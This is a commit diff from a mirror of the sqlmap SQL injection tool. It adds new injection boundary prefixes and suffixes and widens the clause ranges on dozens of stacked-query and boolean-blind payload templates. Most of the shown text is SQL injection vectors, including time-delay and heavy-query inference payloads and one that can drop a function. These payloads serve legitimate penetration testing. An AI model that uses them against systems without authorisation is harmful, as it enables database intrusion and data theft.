sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-25 02:53:46 +03:00
Code Issues Packages Projects Releases Wiki Activity

Cleaning a mess with stacked queries and pre-WHERE boundaries

Browse Source
This commit is contained in:
Miroslav Stampar 2018-09-14 10:30:58 +02:00
parent a5e3dce26f
commit 35d9ed8476
6 changed files with 89 additions and 49 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/settings.py
View File

@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.2.9.22"
VERSION = "1.2.9.23"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

4
lib/parse/payloads.py
View File

@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission
"""
import os
import re
from xml.etree import ElementTree as et
@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException
from lib.core.settings import PAYLOAD_XML_FILES
def cleanupVals(text, tag):
if tag == "clause" and '-' in text:
text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)
if tag in ("clause", "where"):
text = text.split(',')

10
txt/checksum.md5
View File

@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py
0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
fcb74fcc9577523524659ec49e2e964b lib/core/session.py
1778dd902fbe5392377fd9b723898bbb lib/core/settings.py
4991b844fe999aba86dfd13a672c95b7 lib/core/settings.py
dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py
a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py
248bd121e0565318e1efaff54aa427bc lib/core/target.py
@ -67,7 +67,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py
6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py
1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py
1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py
f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py
f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py
492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py
30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py
2b81435f5a7519298c15c724e3194a0d lib/request/basic.py
@ -471,13 +471,13 @@ d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml
d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml
350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml
817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml
de871ef9c982799a7f7f84621f103f26 xml/boundaries.xml
3059d50cf0cd17a403c17833f0bcd4df xml/boundaries.xml
6cffc395cd0280f5c1a84542da6642e5 xml/errors.xml
a279656ea3fcb85c727249b02f828383 xml/livetests.xml
fe2a865a8579f2045d2be057a00f5b49 xml/payloads/boolean_blind.xml
1d5d2027cabbd1c9ff317d97ae8fe92a xml/payloads/boolean_blind.xml
0656ba4132cd02477be90e65a7ddf6ce xml/payloads/error_based.xml
06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
82c65823a0af3fccbecf37f1c75f0b29 xml/payloads/stacked_queries.xml
92c41925eba27afeed76bceba6b18be2 xml/payloads/time_blind.xml
ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml
b148ef9ef70aaada9eb6e58ab1e384e1 xml/queries.xml

36
xml/boundaries.xml
View File

@ -413,6 +413,42 @@ Formats:
<prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+'</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)||</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>1</ptype>
<prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+</suffix>
</boundary>
<boundary>
<level>5</level>
<clause>9</clause>
<where>1</where>
<ptype>2</ptype>
<prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
<suffix>)+</suffix>
</boundary>
<!-- End of pre-WHERE generic boundaries -->
<!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->

18
xml/payloads/boolean_blind.xml
View File

@ -1386,7 +1386,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
<request>
@ -1407,7 +1407,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)</vector>
<request>
@ -1428,7 +1428,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)</vector>
<request>
@ -1449,7 +1449,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1</vector>
<request>
@ -1469,7 +1469,7 @@ Tag: <test>
<stype>1</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]</vector>
<request>
@ -1491,7 +1491,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)</vector>
<request>
@ -1513,7 +1513,7 @@ Tag: <test>
<stype>1</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL</vector>
<request>
@ -1533,7 +1533,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IIF([INFERENCE],1,1/0)</vector>
<request>
@ -1553,7 +1553,7 @@ Tag: <test>
<stype>1</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END</vector>
<request>

68
xml/payloads/stacked_queries.xml
View File

@ -7,7 +7,7 @@
<stype>4</stype>
<level>2</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -28,7 +28,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
@ -48,7 +48,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -69,7 +69,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -89,7 +89,7 @@
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -109,7 +109,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request>
@ -128,7 +128,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -149,7 +149,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -169,7 +169,7 @@
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -189,7 +189,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -208,7 +208,7 @@
<stype>4</stype>
<level>3</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -230,7 +230,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -251,7 +251,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
@ -273,7 +273,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request>
@ -294,7 +294,7 @@
<stype>4</stype>
<level>1</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -314,7 +314,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -333,7 +333,7 @@
<stype>4</stype>
<level>2</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -353,7 +353,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request>
@ -372,7 +372,7 @@
<stype>4</stype>
<level>4</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -392,7 +392,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -411,7 +411,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -431,7 +431,7 @@
<stype>4</stype>
<level>5</level>
<risk>1</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request>
@ -450,7 +450,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@ -470,7 +470,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request>
@ -489,7 +489,7 @@
<stype>4</stype>
<level>3</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -510,7 +510,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -530,7 +530,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
@ -551,7 +551,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request>
@ -571,7 +571,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@ -591,7 +591,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3,9</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request>
@ -610,7 +610,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@ -631,7 +631,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@ -651,7 +651,7 @@
<stype>4</stype>
<level>4</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>
@ -672,7 +672,7 @@
<stype>4</stype>
<level>5</level>
<risk>2</risk>
<clause>0</clause>
<clause>1-8</clause>
<where>1</where>
<vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request>